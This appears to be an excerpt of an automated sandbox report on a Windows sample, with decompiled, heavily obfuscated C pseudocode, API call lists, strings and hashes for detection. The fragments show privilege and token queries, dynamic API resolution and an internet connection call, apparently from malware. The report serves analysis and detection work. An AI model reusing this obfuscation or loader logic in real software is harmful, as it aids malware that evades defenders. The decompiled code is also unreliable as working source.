				_t52 =  *(_t153 - 8);
				 *0x50848b = _t52;
				 *(_t153 - 8) = _t52;
				 *((intOrPtr*)(_t153 - 0x18)) =  *((intOrPtr*)(_t153 - 0x18)) + 0x428616;
				 *((intOrPtr*)(_t153 - 0x18)) = _t122;
				_t123 =  *0x508160; // 0x6f15
				 *((intOrPtr*)(_t153 - 0x14)) = 0x355170;
				_t126 = (_t123 | 0x000062df) + (_t123 | 0x000062df) - 0x8268;
				_t63 = GetTokenInformation( *(_t153 - 0x48), ??, ??, ??, ??);
				if(_t63 == 0) {
					 *(_t153 - 8) = _t63;
					 *((intOrPtr*)(_t153 - 0x10)) = 0x3b039e;
					_push( *(_t153 - 0x48));
					_t70 =  *(_t153 - 8);
					if(_t126 > _t126) {
					}
					 *(_t153 - 8) = _t70;
					_push(0x4abca4);
					_push( *0x508af7);
					return  *(_t153 - 8);
				}
				 *0x5081ec = _t139;
				if((_t139 & 0x000000a8) != 0 || 0 > 0) {
					 *0x5086d7 =  *0x5086d7 - _t148;
					_t148 = _t148 - _t63;
					if(_t63 <= 0x1834) {
						 *(_t153 - 0xc) = _t63;
						 *0x508104 =  *0x508104 + 0x3910ed;
						_t126 = 0x71;
						 *0x50afde =  *0x50afde + 0x71;
					}
				}
				_t143 = 0x50afdf;
				_t73 =  *((intOrPtr*)(_t153 - 0x4c));
				_t150 = 0 >> _t126;
				if(_t148 == 0) {
					L9:
					_t126 =  *0x50815e; // 0x67a3
					 *0x5081aa = _t143;
					_t143 = 0xffffffffffffff5d;
					 *0x50afe1 =  *0x50afe1 + _t73;
					 *0x50afe1 = _t73;
					if((_t150 & 0x0000b7fc) < 0) {
						 *0x50abec =  *0x50abec + _t148;
					}
					goto L11;
				} else {
					_t148 = _t148 + 0xd5927d;
					 *0x50afe6 = _t73;
					if(_t73 == 0x222e) {
						L11:
						 *0x50afd8 =  *0x50afd8 - _t73;
						 *0x50afd8 =  *0x50afd8 + _t73;
						_t74 =  *_t73;
						 *(_t153 - 0x60) = _t74;
						if(_t74 != 0) {
							L14:
							_t126 = _t126;
							if((_t143 & 0x0076525a) >= 0) {
								L17:
								_t100 =  *(_t153 - 8) - 0x265b;
								if(_t74 != 0x2e3e) {
									L21:
									_t143 = _t143 + _t143;
									L22:
									_push( *(_t153 - 0x60));
									_t139 = _t143 + 0x9a9d85 - 0xa0;
									 *(_t153 - 8) = _t74;
									_t63 = "wlanmsm.dll";
									 *(_t153 - 0xc) = "wlanmsm.dll";
									_push(1);
									_push(0xaf82);
									_push(0xaf82);
									_push(0x4ab45e);
									_t126 = E004A9AAF;
									goto __ecx;
								}
								 *0x5080b0 =  *0x5080b0 + _t100;
								if( *((intOrPtr*)(_t153 - 0x14)) >  *((intOrPtr*)(_t153 - 0x14))) {
									goto L22;
								}
								L19:
								L20:
								_t143 = 0;
								goto L21;
							}
							_t143 = 0x93b2;
							 *0x509a67 =  *0x509a67 + 0x93b2;
							 *0x50a8e6 =  *0x50a8e6;
							if(_t148 <= 0) {
								goto L20;
							}
							goto L17;
						}
						if(_t74 < 0x1352bb) {
							goto L19;
						}
						_t126 = 0x6463;
						 *0x50afde =  *0x50afde + 0x6463;
						goto L14;
					}
					 *0x50afdc =  *0x50afdc - "BuildExplicitAccessWithNameA" - 0x3af0ab;
					goto L9;
				}
			}
















                                                          0x004ab1ff
                                                          0x004ab1ff
                                                          0x004ab203
                                                          0x004ab208
                                                          0x004ab20f
                                                          0x004ab212
                                                          0x004ab217
                                                          0x004ab24b
                                                          0x004ab24e
                                                          0x004ab251
                                                          0x004ab262
                                                          0x004ab275
                                                          0x004ab27a
                                                          0x004ab282
                                                          0x004abc39
                                                          0x004abc47
                                                          0x004abc55
                                                          0x004abc73
                                                          0x004abc78
                                                          0x004abc78
                                                          0x004abc8d
                                                          0x004abc98
                                                          0x004abc9d
                                                          0x004abca3
                                                          0x004abca3
                                                          0x004ab288
                                                          0x004ab292
                                                          0x004ab2a2
                                                          0x004ab2ab
                                                          0x004ab2b7
                                                          0x004ab2b9
                                                          0x004ab2c7
                                                          0x004ab2d3
                                                          0x004ab2d6
                                                          0x004ab2d6
                                                          0x004ab2b7
                                                          0x004ab2de
                                                          0x004ab2e4
                                                          0x004ab2e7
                                                          0x004ab2ec
                                                          0x004ab31a
                                                          0x004ab322
                                                          0x004ab329
                                                          0x004ab335
                                                          0x004ab338
                                                          0x004ab33e
                                                          0x004ab349
                                                          0x004ab350
                                                          0x004ab356
                                                          0x00000000
                                                          0x004ab2ee
                                                          0x004ab2ee
                                                          0x004ab2f4
                                                          0x004ab30a
                                                          0x004ab358
                                                          0x004ab35e
                                                          0x004ab364
                                                          0x004ab371
                                                          0x004ab374
                                                          0x004ab379
                                                          0x004ab3a5
                                                          0x004ab3a5
                                                          0x004ab3ad
                                                          0x004ab3d9
                                                          0x004ab3e0
                                                          0x004ab3e9
                                                          0x004ab40e
                                                          0x004ab40e
                                                          0x004ab410
                                                          0x004ab416
                                                          0x004ab419
                                                          0x004ab41c
                                                          0x004ab436
                                                          0x004ab43b
                                                          0x004ab44e
                                                          0x004ab450
                                                          0x004ab451
                                                          0x004ab452
                                                          0x004ab457
                                                          0x004ab45c
                                                          0x004ab45c
                                                          0x004ab3eb
                                                          0x004ab3f7
                                                          0x00000000
                                                          0x00000000
                                                          0x004ab3f9
                                                          0x004ab3fe
                                                          0x004ab40b
                                                          0x00000000
                                                          0x004ab40b
                                                          0x004ab3af
                                                          0x004ab3b3
                                                          0x004ab3c3
                                                          0x004ab3cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004ab3d3
                                                          0x004ab386
                                                          0x00000000
                                                          0x00000000
                                                          0x004ab39b
                                                          0x004ab39f
                                                          0x00000000
                                                          0x004ab39f
                                                          0x004ab314
                                                          0x00000000
                                                          0x004ab314

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000000,00000001), ref: 004AB27A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: InformationToken
                                                          • String ID: BuildExplicitAccessWithNameA$CIRCoInst.dll$CNHMWL.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$pQ5$wlanmsm.dll
                                                          • API String ID: 4114910276-3280036276
                                                          • Opcode ID: 11571fe8b1124ec8e0e7ac6c838ed621b31e540b9efd0e18b0fcb4633e4a5fcf
                                                          • Instruction ID: 574ccd0fc51804da34fd6601f3b5d2d4c09dcd1ff0de0441aefb97794f1e5afd
                                                          • Opcode Fuzzy Hash: 11571fe8b1124ec8e0e7ac6c838ed621b31e540b9efd0e18b0fcb4633e4a5fcf
                                                          • Instruction Fuzzy Hash: EB71CE79E0034A9FCB00DFB8E894ADE7FB1EB3A320F04416AD944A7352E7750949DB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004D642F Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 200networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?), ref: 004D6588
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ConnectInternet
                                                          • String ID: BuildExplicitAccessWithNameA$Ix-$a4)$api-ms-win-core-rtlsupport-l1-1-0.dll$charmap.exe$X7
                                                          • API String ID: 3050416762-2050661817
                                                          • Opcode ID: fd8bfbb3770e200e410d9aa409e67f534f47b368f1badf5f42fa958cd50dbfeb
                                                          • Instruction ID: f6d3bfee123f6b6b6ff354e4308ca077beec78c3871fcc64ac10e413510b132f
                                                          • Opcode Fuzzy Hash: fd8bfbb3770e200e410d9aa409e67f534f47b368f1badf5f42fa958cd50dbfeb
                                                          • Instruction Fuzzy Hash: 537105B9A447429FC701CF78EC64BDD3BB1EB35320B08406BD884D7362EA78090AE756
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004ACABB Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 004ACB68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: AllocConsole$GetTickCount64$PenIMC_v0400.dll$RtlEthernetStringToAddressW$WindowsCodecs.dll$wlanmsm.dll
                                                          • API String ID: 3964851224-3425434924
                                                          • Opcode ID: e8df3d6847dcc4f7dc5b558a232467e5ff7a6f5940d03f83cf452a77211a09bb
                                                          • Instruction ID: aaa7daa4403868453afcfa7e88fd3a5e3c37339016c6c8e83c49b83e8a94ae5b
                                                          • Opcode Fuzzy Hash: e8df3d6847dcc4f7dc5b558a232467e5ff7a6f5940d03f83cf452a77211a09bb
                                                          • Instruction Fuzzy Hash: B951B074E4430A9BDB00DFA9E8D06DE7BB1FF39320B44417A9989E7352E7380946DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00493920 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 161libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E00493920() {
				signed char _t37;
				signed char _t38;
				signed char _t43;
				signed char _t47;
				signed char _t49;
				signed char _t52;
				_Unknown_base(*)()* _t53;
				void* _t62;
				void* _t66;
				intOrPtr _t76;
				void* _t88;
				short _t90;
				signed char _t95;
				signed char _t97;
				signed short _t100;
				short _t104;
				signed int _t117;
				unsigned short _t118;
				signed int _t119;
				void* _t120;

				_t63 = _t62 + 1;
				 *((intOrPtr*)(_t120 - 0xc)) = _t62 + 1;
				_t90 =  *((intOrPtr*)(_t120 - 0x10)) - 0x6802;
				_t37 =  *(_t120 - 8);
				if(_t90 < _t90) {
					if((_t100 & 0x00008f6f) != 0) {
						 *0x50822a = _t100;
					}
					_t63 = 0xc2;
				}
				 *0x50afe3 = _t37;
				_t38 = E005007C9(_t63 + 0xea, _t117);
				_t118 = _t117 ^ 0x0000c7ab;
				 *0x50afe6 = _t38;
				 *(_t120 - 8) = _t38;
				if(_t38 == 0x23) {
					L9:
					 *0x508537 = 0xfc;
					_t66 = 0x2e98a5;
					 *0x50afda =  *0x50afda + 0x2e98a5;
					goto L10;
				} else {
					_t88 =  *((intOrPtr*)(_t120 - 0xc)) + 0x3bcd4a;
					 *0x50afdc =  *0x50afdc - _t88;
					_t66 = _t88 + _t88;
					if(_t90 <= _t90) {
						_t90 = 0x6a19;
						_t100 =  *0x5081e2; // 0x81c6
						 *0x50afe0 =  *0x50afe0 - _t100;
						E00508230 = E00508230 + _t118;
						_t118 = _t118 + _t118;
						_t38 =  *0x50afe3; // -68
					}
					if(_t118 < 0) {
						L10:
						 *0x508164 = _t90;
						_t43 =  *(_t120 - 8);
						 *(_t120 - 0x2c) = _t43;
						 *0x5081b4 = _t90;
						 *(_t120 - 8) = _t43;
						 *((intOrPtr*)(_t120 - 0xc)) = _t66 - 1;
						_t47 =  *(_t120 - 8);
						if(_t90 - 0x5d77 == _t90 - 0x5d77) {
							 *0x5081bc = _t100;
							 *0x5081d6 = _t100;
						}
						 *(_t120 - 8) = _t47;
						_t49 =  *(_t120 - 8);
						_push( *(_t120 - 0x2c));
						 *(_t120 - 8) = _t49;
						if(_t49 >= 0x23) {
							 *0x5080f2 =  *0x5080f2 + 0x3b4a22;
						}
						_t104 =  *0x5081e0; // 0x189d
						_t52 =  *(_t120 - 8);
						_push( *0x508457);
						_t95 =  *0x508166; // 0x0
						 *0x5081b4 = _t104;
						_t119 = _t118 >> _t95;
						if((_t52 & 0x000000bd) >= 0) {
						}
						 *0x508012 =  *0x508012 - _t52;
						_t53 = GetProcAddress(??, ??);
						if((_t119 & 0x00a1195f) == 0) {
							 *0x508286 =  *0x508286 + _t119;
							 *0x50afe3 = _t53;
						}
						 *(_t120 - 8) = _t53;
						 *0x50811a =  *0x50811a + _t95;
						_t97 = _t95 + _t95 + 0x7597;
						_t76 =  *0x508acf; // 0x500000
						E00465B85(_t119, _t97, 1);
						 *0x50818c = _t97;
						 *((intOrPtr*)(_t120 - 0xc)) = (_t76 - 0x3f72 >> _t97) + (_t76 - 0x3f72 >> _t97);
						E00465B85(_t119, 1, 1);
						_push(1);
						_push(0);
						_push(0x493b8b);
						goto __ebx;
					} else {
						 *0x50afe5 = _t38;
						goto L9;
					}
				}
			}























                                                          0x00493924
                                                          0x00493925
                                                          0x0049392d
                                                          0x00493932
                                                          0x00493938
                                                          0x00493942
                                                          0x00493944
                                                          0x00493944
                                                          0x0049394e
                                                          0x0049394e
                                                          0x00493950
                                                          0x00493962
                                                          0x00493967
                                                          0x00493973
                                                          0x00493978
                                                          0x0049397d
                                                          0x004939ca
                                                          0x004939d2
                                                          0x004939de
                                                          0x004939e3
                                                          0x00000000
                                                          0x0049397f
                                                          0x00493982
                                                          0x00493988
                                                          0x0049398e
                                                          0x00493993
                                                          0x00493995
                                                          0x0049399f
                                                          0x004939a6
                                                          0x004939ac
                                                          0x004939b3
                                                          0x004939b5
                                                          0x004939b5
                                                          0x004939bd
                                                          0x004939eb
                                                          0x004939ec
                                                          0x004939f3
                                                          0x004939f6
                                                          0x004939f9
                                                          0x00493a00
                                                          0x00493a0a
                                                          0x00493a26
                                                          0x00493a30
                                                          0x00493a39
                                                          0x00493a40
                                                          0x00493a40
                                                          0x00493a4d
                                                          0x00493a59
                                                          0x00493a5c
                                                          0x00493a69
                                                          0x00493a6e
                                                          0x00493a78
                                                          0x00493a84
                                                          0x00493a8f
                                                          0x00493a9e
                                                          0x00493aa6
                                                          0x00493aae
                                                          0x00493ab5
                                                          0x00493ac9
                                                          0x00493acf
                                                          0x00493acf
                                                          0x00493ae1
                                                          0x00493ae8
                                                          0x00493af4
                                                          0x00493af6
                                                          0x00493afd
                                                          0x00493b07
                                                          0x00493b0c
                                                          0x00493b1e
                                                          0x00493b2b
                                                          0x00493b36
                                                          0x00493b4a
                                                          0x00493b52
                                                          0x00493b6f
                                                          0x00493b76
                                                          0x00493b7b
                                                          0x00493b7d
                                                          0x00493b7f
                                                          0x00493b89
                                                          0x004939bf
                                                          0x004939bf
                                                          0x00000000
                                                          0x004939c4
                                                          0x004939bd

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00493AE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: "J;$CIRCoInst.dll$CNHMWL.dll$Display.dll$EtwEventWriteStartScenario$Nqt
                                                          • API String ID: 190572456-3345187357
                                                          • Opcode ID: 05d4fa36f585e38a718f42d75413a85554affebdf692b6dd38bb3edc5e04fbd3
                                                          • Instruction ID: 84a109258601607af15e7e47908b363d4205c8e2a8075759f42827cbd6f40324
                                                          • Opcode Fuzzy Hash: 05d4fa36f585e38a718f42d75413a85554affebdf692b6dd38bb3edc5e04fbd3
                                                          • Instruction Fuzzy Hash: DD510379A107469FCB00DFB8E894ADD7FB1EB3A320F04407AD885AB362E7750549DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B255C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E004B255C() {
				char* _t27;
				long _t28;
				long _t30;
				char* _t31;
				long _t33;
				long _t35;
				void* _t41;
				char* _t43;
				void* _t60;
				short _t71;
				void* _t85;
				signed int _t87;
				signed int _t88;
				void* _t89;
				void* _t91;

				_t27 =  *(_t91 - 8);
				if(_t41 - 0x34 <= _t41 - 0x34) {
					_t71 = _t60 + 0x64;
					 *0x50817a = _t71;
					 *0x50821a = 0x9258;
					_t87 = _t87 - 0xa69c00;
					 *0x50afe5 = _t27;
					if(_t85 <= 0 || 0x448b == 0x448b) {
						 *0x508132 = _t71;
					}
				}
				 *0x50afe1 = _t27;
				_t88 = _t87 ^ 0x000000c6;
				_t43 =  *0x50afe3; // -68
				_push(0);
				_pop(_t28);
				 *0x5081d6 =  *0x5081d6 - 0x85cb;
				 *(_t91 - 8) = _t28;
				if(_t28 < 0x2057) {
					if(_t43 != 0x39) {
						_t43 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
					}
				}
				_t65 = 0x674c;
				 *0x5081a6 = 0x674c;
				_t80 = 0x871324;
				_t30 = GetLastError();
				 *0x5081f4 = 0x871324;
				 *(_t91 - 8) = _t30;
				_t31 = "wmi.dll";
				if(_t43 == 0x25f343) {
					_t43 = "LookupPrivilegeValueA";
					_t65 = 0xe16f;
					_t80 =  *0x5081fa; // 0x8a34
				}
				 *0x50afe1 = _t31;
				_t89 = _t88 + 0xc800;
				 *0x50afe5 = 0;
				_t33 =  *(_t91 - 8);
				 *(_t91 - 8) = _t33;
				 *(_t91 - 8) = _t33;
				_t35 =  *(_t91 - 8);
				 *(_t91 - 0x44) = _t35;
				if((_t80 - 0x0000009d & 0x000000a5) == 0) {
					 *0x509dc3 =  *0x509dc3 - _t89;
				}
				 *(_t91 - 8) = _t35;
				E004B009D(_t35, 0, _t65, _t35, _t35, _t35);
				 *((intOrPtr*)(_t91 - 0x10)) =  *((intOrPtr*)(_t91 - 0x10)) + 0x36e765;
				 *((intOrPtr*)(_t91 - 0xc)) =  *((intOrPtr*)(_t91 - 0xc)) + 0x22a07e;
				 *((intOrPtr*)(_t91 - 0x10)) = 0x36e765;
				 *0x508136 =  *0x508136 + _t65;
				_push(0x4b2ed4);
				goto __ecx;
			}


















                                                          0x004b2562
                                                          0x004b2568
                                                          0x004b256c
                                                          0x004b256f
                                                          0x004b2584
                                                          0x004b258d
                                                          0x004b2593
                                                          0x004b259a
                                                          0x004b25bc
                                                          0x004b25bc
                                                          0x004b259a
                                                          0x004b25dc
                                                          0x004b25e2
                                                          0x004b25e8
                                                          0x004b25f0
                                                          0x004b25f1
                                                          0x004b2dc8
                                                          0x004b2dd8
                                                          0x004b2ddf
                                                          0x004b2de7
                                                          0x004b2de9
                                                          0x004b2de9
                                                          0x004b2de7
                                                          0x004b2df1
                                                          0x004b2df5
                                                          0x004b2dfe
                                                          0x004b2e07
                                                          0x004b2e0d
                                                          0x004b2e14
                                                          0x004b2e17
                                                          0x004b2e22
                                                          0x004b2e2a
                                                          0x004b2e39
                                                          0x004b2e4c
                                                          0x004b2e4c
                                                          0x004b2e53
                                                          0x004b2e5b
                                                          0x004b2e60
                                                          0x004b2e65
                                                          0x004b2e6a
                                                          0x004b2e6d
                                                          0x004b2e74
                                                          0x004b2e7e
                                                          0x004b2e87
                                                          0x004b2e89
                                                          0x004b2e8f
                                                          0x004b2e91
                                                          0x004b2e97
                                                          0x004b2ea4
                                                          0x004b2eb2
                                                          0x004b2eb5
                                                          0x004b2ebe
                                                          0x004b2ec8
                                                          0x004b2ed2

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$RtlEthernetStringToAddressW$api-ms-win-core-rtlsupport-l1-1-0.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-2583003684
                                                          • Opcode ID: 29e28c72218af6bd50cd4ee3c14c756a1f3d675d095c57346bb940944524a375
                                                          • Instruction ID: 07d118654e3ba631fc6ad79ad9d69e432f57647faf4cd6562eda770001ed9fb5
                                                          • Opcode Fuzzy Hash: 29e28c72218af6bd50cd4ee3c14c756a1f3d675d095c57346bb940944524a375
                                                          • Instruction Fuzzy Hash: EE412174D04306AFDB00DFB8D998AEE7BB1FF38310F04422AC88597756E2790A46D759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004CC620 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 119registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 45%
                                                          			E004CC620() {
				long _t36;
				long _t41;
				long _t45;
				long _t47;
				long _t54;
				unsigned short _t91;
				unsigned short _t92;
				intOrPtr _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				 *(_t108 - 0x18) =  !0x001EFA56;
				 *(_t108 - 0x64) = _t36;
				if(0xa0 >= 0) {
					 *0x50afe1 = _t36;
					 *0x50afe3 = _t36;
				}
				 *(_t108 - 8) = _t36;
				 *((intOrPtr*)(_t108 - 0x14)) = 0x3365e8;
				 *((intOrPtr*)(_t108 - 0x14)) = 0x3365e8;
				_t41 =  *(_t108 - 8);
				_t92 = _t91 >> _t91;
				if(_t92 <= _t92) {
					_t92 = 0x8150;
				}
				 *(_t108 - 8) = _t41;
				 *0x5080de =  *0x5080de + 0x3b65;
				_push( *((intOrPtr*)(_t108 - 0x60)));
				_t45 =  *(_t108 - 8);
				 *(_t108 - 8) = _t45;
				if(_t45 > 0x171c) {
					 *0x5080b2 =  *0x5080b2 -  !0x00000000;
					 *(_t108 - 0x18) =  !0x00000000;
					_t92 = _t92 + 0x545e4d;
				}
				 *0x50816e = _t92;
				_t103 =  *0x5081bc; // 0x381a
				_t47 = RegCloseKey(??);
				if(_t47 == 0) {
					_t105 = _t105;
					 *(_t108 - 0xc) = _t47;
				}
				 *(_t108 - 8) = _t47;
				 *0x508140 = 0x680b;
				_t52 =  *(_t108 - 8);
				L004BDD02( *(_t108 - 8), 0x1b592a, 0x7b, _t103 + 0x80bd, _t105, _t107,  *(_t108 - 8), _t52);
				_t54 =  *(_t108 - 8);
				if( *(_t108 - 0x64) == 0) {
					 *(_t108 - 0x18) = 0x296d98;
					 *((intOrPtr*)(_t108 - 0x68)) = 1;
				}
				 *(_t108 - 8) = _t54;
				 *((intOrPtr*)(_t108 - 0x14)) =  *((intOrPtr*)(_t108 - 0x14)) + "WindowsCodecs.dll";
				 *0x508162 =  *0x508162 + 0x62fb;
				_push(0x62fb);
				_push(1);
				_push(E004CC7D2);
				goto __ecx;
			}














                                                          0x004cc62e
                                                          0x004cc633
                                                          0x004cc63f
                                                          0x004cc641
                                                          0x004cc647
                                                          0x004cc647
                                                          0x004cc655
                                                          0x004cc671
                                                          0x004cc674
                                                          0x004cc682
                                                          0x004cc685
                                                          0x004cc68e
                                                          0x004cc690
                                                          0x004cc690
                                                          0x004cc694
                                                          0x004cc6a5
                                                          0x004cc6af
                                                          0x004cc6ba
                                                          0x004cc6c1
                                                          0x004cc6c8
                                                          0x004cc6d2
                                                          0x004cc6d9
                                                          0x004cc6df
                                                          0x004cc6df
                                                          0x004cc6e8
                                                          0x004cc6f7
                                                          0x004cc6fe
                                                          0x004cc706
                                                          0x004cc710
                                                          0x004cc71f
                                                          0x004cc731
                                                          0x004cc738
                                                          0x004cc754
                                                          0x004cc772
                                                          0x004cc780
                                                          0x004cc785
                                                          0x004cc78c
                                                          0x004cc796
                                                          0x004cc799
                                                          0x004cc799
                                                          0x004cc7a0
                                                          0x004cc7ab
                                                          0x004cc7bc
                                                          0x004cc7c3
                                                          0x004cc7c4
                                                          0x004cc7c6
                                                          0x004cc7d0

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: C1&$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$WindowsCodecs.dll$tsbyuv.dll$e3
                                                          • API String ID: 3535843008-3197220747
                                                          • Opcode ID: 6ef4518081ee94e561716ad114c813a4f2bae57cbb27d42aff625f45a58302d2
                                                          • Instruction ID: af91980a4b6d3abed53edd8424d06ba2cda6f880e5c663eb0e01ef1b4d7f6d6f
                                                          • Opcode Fuzzy Hash: 6ef4518081ee94e561716ad114c813a4f2bae57cbb27d42aff625f45a58302d2
                                                          • Instruction Fuzzy Hash: 114158B9E1030A9BCB00DFB8D9C5ADEBFB0FB29310F04517AD948E7346E2741A458B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004FF892 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 32%
                                                          			E004FF892(short __ecx, signed int __edx, void* __edi, short __esi) {
				int _t33;
				int _t35;
				int _t42;
				int _t43;
				int _t45;
				unsigned short _t62;
				intOrPtr _t75;
				signed int _t85;
				short _t89;
				void* _t90;

				_t89 = __esi;
				_t85 = __edx;
				asm("adc eax, 0x508216");
				_t33 =  *(_t90 - 8);
				if( *((intOrPtr*)(_t90 - 0x40)) != 0) {
					 *0x50858f = _t33;
					 *(_t90 - 0xc) = _t33;
					 *(_t90 - 0x10) = 0xffffffffffffffd9;
					_t35 =  *(_t90 - 0xc);
					if(0xffffffffffffffb2 != 0xffffffffffffffb2) {
						 *0x50afdd =  *0x50afdd + __ecx;
						 *0x508150 = __ecx;
						 *0x50816c = __ecx;
						 *0x5081d4 =  *0x5081d4 - __edx;
						 *0x50afe0 =  *0x50afe0 - __edx;
					}
					 *(_t90 - 8) = _t35;
					_t75 =  *0x508156; // 0x124b
					 *0x50818a =  *0x50818a - _t75;
					 *0x5081a4 =  *0x5081a4 + _t85;
					E004AD021( *(_t90 - 8), "Display.dll", _t75, 1, 1,  *(_t90 - 8));
					_t42 =  *(_t90 - 8);
					 *(_t90 - 8) = _t42;
					if(_t42 > 0x1b) {
						if(_t42 > 0x1f4821) {
							 *(_t90 - 0x14) = "EnumWindowStationsA";
						}
					}
					 *((intOrPtr*)(_t90 - 0x1c)) =  *((intOrPtr*)(_t90 - 0x1c)) - 0x61f4;
					 *0x508196 = 0x61f4;
					_t43 =  *(_t90 - 8);
					_push( *((intOrPtr*)(_t90 - 0x40)));
					 *0x50afe6 = _t43;
					 *(_t90 - 8) = _t43;
					_t62 = 0x3d70e8 >> 0x61f4;
					_t45 =  *(_t90 - 8);
					if((_t85 & 0x007602fa) >= 0) {
						_t85 = _t85 + 0x84277e;
						 *0x508238 = _t89;
						 *0x50afe5 = _t45;
						if(_t45 <= 0) {
						}
						_t62 = 0x292a00;
					}
					if(_t62 != 0x35c8) {
						L14:
						 *0x5081ea = _t85;
					} else {
						 *(_t90 - 0x10) = _t62;
						_t62 = _t62 - 0x4e;
						if(0x5d34 >= 0x5d34) {
							goto L14;
						}
					}
					_t33 = FreeLibrary();
				}
				return  *((intOrPtr*)(_t90 - 0x4c));
			}













                                                          0x004ff892
                                                          0x004ff892
                                                          0x004ff892
                                                          0x004ff8a2
                                                          0x004ff8b3
                                                          0x004ff8ba
                                                          0x004ff8c4
                                                          0x004ff8c7
                                                          0x004ff8ca
                                                          0x004ff8d2
                                                          0x004ff8d4
                                                          0x004ff8da
                                                          0x004ff8e1
                                                          0x004ff8ef
                                                          0x004ff8f6
                                                          0x004ff8f6
                                                          0x004ff8fc
                                                          0x004ff918
                                                          0x004ff91f
                                                          0x004ff926
                                                          0x004ff935
                                                          0x004ff948
                                                          0x004ff94d
                                                          0x004ff952
                                                          0x004ff959
                                                          0x004ff965
                                                          0x004ff965
                                                          0x004ff968
                                                          0x004ff96f
                                                          0x004ff972
                                                          0x004ff97c
                                                          0x004ff97f
                                                          0x004ff982
                                                          0x004ff98d
                                                          0x004ff99d
                                                          0x004ff9ac
                                                          0x004ff9b8
                                                          0x004ff9ba
                                                          0x004ff9c0
                                                          0x004ff9d1
                                                          0x004ff9da
                                                          0x004ff9da
                                                          0x004ff9e5
                                                          0x004ff9e5
                                                          0x004ff9ef
                                                          0x004ffa09
                                                          0x004ffa09
                                                          0x004ff9f1
                                                          0x004ff9f1
                                                          0x004ff9f4
                                                          0x004ff9fd
                                                          0x00000000
                                                          0x004ffa04
                                                          0x004ff9fd
                                                          0x004ffa16
                                                          0x004ffa16
                                                          0x004ffa23

                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004FFA16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: Display.dll$EnumWindowStationsA$RtlEthernetStringToAddressW$credssp.dll$p=
                                                          • API String ID: 3664257935-2222342485
                                                          • Opcode ID: 444df9aee8f6098dac06b8b36ad404476d7f9ac72f228940b920aaa67cab7ed8
                                                          • Instruction ID: 179f79963e47a61a3cd8e3eb1df2e083c96c56e3f4f45ed35f1705f893bea87d
                                                          • Opcode Fuzzy Hash: 444df9aee8f6098dac06b8b36ad404476d7f9ac72f228940b920aaa67cab7ed8
